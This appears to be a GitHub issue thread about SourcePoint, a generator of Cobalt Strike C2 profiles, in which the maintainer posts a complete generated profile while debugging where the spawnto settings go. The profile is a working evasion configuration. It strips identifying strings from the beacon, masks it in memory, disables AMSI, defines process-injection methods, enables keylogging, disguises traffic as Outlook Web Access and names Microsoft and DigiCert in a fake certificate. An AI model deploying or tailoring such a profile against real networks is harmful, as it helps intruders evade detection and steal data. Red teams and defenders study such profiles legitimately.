Sorry, I am a bit confused: there isn't a spawnto_x86 or spawnto_x64 in the stage block; those live in post-ex. Here's an example of one I just made.
./SourcePoint -Yaml ../../Documents/Important-Docs/SourcePoint/Sample.yaml
_____ ____ _ __
/ ___/____ __ _______________ / __ \____ (_)___ / /_
\__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
___/ / /_/ / /_/ / / / /__/ __/ ____/ /_/ / / / / / /_
/____/\____/\__,_/_/ \___/\___/_/ \____/_/_/ /_/\__/
(@Tyl0us)
[*] Preparing Varibles...
[*] Building Profile...
[!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects
[*] Post-Ex Process Name: gpupdate.exe
[*] Seleted Profile: Slack
[+] Profile Generated: acme.profile
[+] Happy Hacking
cat acme.profile
I think I just typed `sourcepoint` with no arguments; it prompted for the first argument, so I entered it and it errored, then I entered the second argument and it errored again, and by the third argument it generated something.
I will check again later.
On Mon, 9 Aug 2021 at 00:11, Tylous @.***> wrote:
Sorry, I am a bit confused, there isn't a spawnto_x86 or spawnto_x64 in the stage field that's in the <.post-ex>. Here's an example of one I just made.
./SourcePoint -Yaml ../../Documents/Important-Docs/SourcePoint/Sample.yaml
_____ ____ _ __ / ___/____ __ _______________ / __ \____ (_)___ / /_ \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
/ / // / // / / / // / ____/ // / / / / / / //\/_,// _/_// ____/// //\/ @.***)
[] Preparing Varibles... [] Building Profile... [!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects [] Post-Ex Process Name: gpupdate.exe [] Seleted Profile: Slack [+] Profile Generated: acme.profile [+] Happy Hacking cat acme.profile
post-ex {
control the temporary process we spawn to
set spawnto_x86 "%windir%\syswow64\gpupdate.exe"; set spawnto_x64 "%windir%\sysnative\gpupdate.exe";
# change the permissions and content of our post-ex DLLs set obfuscate "true"; # pass key function pointers from Beacon to its child jobs set smartinject "true"; # disable AMSI in powerpick, execute-assembly, and psinject set amsi_disable "true";
control the method used to log keystrokes
set keylogger "SetWindowsHookEx"; }
Can you provide the command-line arguments you entered so I can attempt to replicate this?
Just following up on this?
./SourcePoint -Outfile example.profile -Host HOST -Injector NtMapViewOfSection
So I ran your command and this is the output I got. The stage section closes properly and spawnto is in the proper place, post-ex.
set host_stage "False";
set sleeptime "49000";
set jitter "22";
set useragent "Mozilla/4.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0";
set data_jitter "50";
set smb_frame_header "";
set pipename "atsvc-4081";
set pipename_stager "atsvc-7243";
set tcp_frame_header "";
set ssh_banner "Welcome to Ubuntu 19.10.0 LTS (GNU/Linux 4.4.0-19037-aws x86_64)";
set ssh_pipename "atsvc-##";
####Manually add these if you're doing C2 over DNS (Future Release)####
##dns-beacon {
# set dns_idle "1.2.3.4";
# set dns_max_txt "199";
# set dns_sleep "1";
# set dns_ttl "5";
# set maxdns "200";
# set dns_stager_prepend "doc-stg-prepend";
# set dns_stager_subhost "doc-stg-sh.";
# set beacon "doc.bc.";
# set get_A "doc.1a.";
# set get_AAAA "doc.4a.";
# set get_TXT "doc.tx.";
# set put_metadata "doc.md.";
# set put_output "doc.po.";
# set ns_response "zero";
#}
stage {
set obfuscate "true";
set stomppe "true";
set cleanup "true";
set userwx "false";
set smartinject "true";
#TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";
set checksum "0";
set compile_time "09 Jul 1995 05:50:04";
set entry_point "137648";
set image_size_x86 "761856";
set image_size_x64 "761856";
set name "ActivationManager.dll";
set rich_header "\x80\x48\xf3\x2d\xc4\x29\x9d\x7e\xc4\x29\x9d\x7e\xc4\x29\x9d\x7e\xcd\x51\x0e\x7e\x6f\x29\x9d\x7e\x9f\x41\x99\x7f\xd0\x29\x9d\x7e\x9f\x41\x9e\x7f\xc7\x29\x9d\x7e\x9f\x41\x98\x7f\xdb\x29\x9d\x7e\xc4\x29\x9c\x7e\x37\x2c\x9d\x7e\x9f\x41\x9c\x7f\xcc\x29\x9d\x7e\x9f\x41\x9d\x7f\xc5\x29\x9d\x7e\x9f\x41\x93\x7f\x97\x29\x9d\x7e\x9f\x41\x60\x7e\xc5\x29\x9d\x7e\x9f\x41\x62\x7e\xc5\x29\x9d\x7e\x9f\x41\x9f\x7f\xc5\x29\x9d\x7e\x52\x69\x63\x68\xc4\x29\x9d\x7e\x00\x00\x00\x00\x00\x00\x00\x00";
transform-x86 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "NtQueueApcThread" "";
strrep "IsWow64Process" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "kernel32" "";
strrep "beacon.dll" "";
strrep "KERNEL32.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
transform-x64 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "beacon.x64.dll" "";
strrep "NtQueueApcThread" "";
strrep "IsWow64Process" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "kernel32" "";
strrep "beacon.dll" "";
strrep "KERNEL32.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
}
process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";
# shape the content and properties of what we will inject
set min_alloc "34775";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
transform-x64 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
# specify how we execute code in the remote process
execute {
CreateThread "ntdll.dll!RtlUserThreadStart+0x2175";
NtQueueApcThread-s;
SetThreadContext;
CreateRemoteThread;
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
RtlCreateUserThread;
}
}
post-ex {
# control the temporary process we spawn to
set spawnto_x86 "%windir%\\syswow64\\wlanext.exe";
set spawnto_x64 "%windir%\\sysnative\\wlanext.exe";
# change the permissions and content of our post-ex DLLs
set obfuscate "true";
# pass key function pointers from Beacon to its child jobs
set smartinject "true";
# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
# control the method used to log keystrokes
set keylogger "SetWindowsHookEx";
}
http-get {
set uri "YRvO5njvARYXbTZarF6VNXVwOUvqiCbSVJd1Vz ";
client {
header "Host" "HOST";
header "Accept" "*/*";
header "Cookie" "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42=ZG0yMzA2KjEs";
metadata {
base64url;
parameter "wa";
}
parameter "path" "/calendar";
}
server {
header "Cache-Control" "no-cache";
header "Pragma" "no-cache";
header "Content-Type" "text/html; charset=utf-8";
header "Server" "Microsoft-IIS/10.0";
header "request-id" "6cfcf35d-0680-4853-98c4-b16723708fc9";
header "X-CalculatedBETarget" "BY2PR06MB549.namprd0<no value>.prod.outlook.com";
header "X-Content-Type-Options" "nosniff";
header "X-OWA-Version" "15.1.1240.20";
header "X-OWA-OWSVersion" "V2017_06_15";
header "X-OWA-MinimumSupportedOWSVersion" "V2_6";
header "X-Frame-Options" "SAMEORIGIN";
header "X-DiagInfo" "BY2PR06MB549";
header "X-UA-Compatible" "IE=EmulateIE7";
header "X-Powered-By" "ASP.NET";
header "X-FEServer" "CY4PR02CA0010";
header "Connection" "close";
output {
base64url;
print;
}
}
}
http-post {
set uri "MUTvuasCYDLZpAA7tWN4qYPctdJqxYv5b-DRkyX ";
set verb "GET";
client {
header "Host" "HOST";
header "Accept" "*/*";
output {
base64url;
parameter "wa";
}
id {
base64url;
prepend "wla42=";
prepend "xid=730bf7;";
prepend "MSPAuth=3EkAjDKjI;";
prepend "ClientId=1C0F6C5D910F9;";
prepend "MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;";
header "Cookie";
}
}
server {
header "Cache-Control" "no-cache";
header "Pragma" "no-cache";
header "Content-Type" "text/html; charset=utf-8";
header "Server" "Microsoft-IIS/10.0";
header "request-id" "6cfcf35d-0680-4853-98c4-b16723708fc9";
header "X-CalculatedBETarget" "BY2PR06MB549.namprd0<no value>.prod.outlook.com";
header "X-Content-Type-Options" "nosniff";
header "X-OWA-Version" "15.1.1240.20";
header "X-OWA-OWSVersion" "V2017_06_15";
header "X-OWA-MinimumSupportedOWSVersion" "V2_6";
header "X-Frame-Options" "SAMEORIGIN";
header "X-DiagInfo" "BY2PR06MB549";
header "X-UA-Compatible" "IE=EmulateIE7";
header "X-Powered-By" "ASP.NET";
header "X-FEServer" "CY4PR02CA0010";
header "Connection" "close";
output {
base64url;
print;
}
}
}
http-stager {
set uri_x86 "/rpc/11481048";
set uri_x64 "/rpc/13651856";
client {
header "Host" "HOST";
header "Accept" "*/*";
}
server {
header "Server" "nginx";
}
}
set O "Microsoft Corporation"; #Organization Name
set C "US"; #Country
set L "Redmond"; #Locality
set OU "DigiCert Inc"; #Organizational Unit Name
set ST "Washington"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
I am not sure what your issue is, but if you could provide a detailed description of the issue along with the raw output, I will be happy to troubleshoot and fix it.
Odd — maybe I used an older version?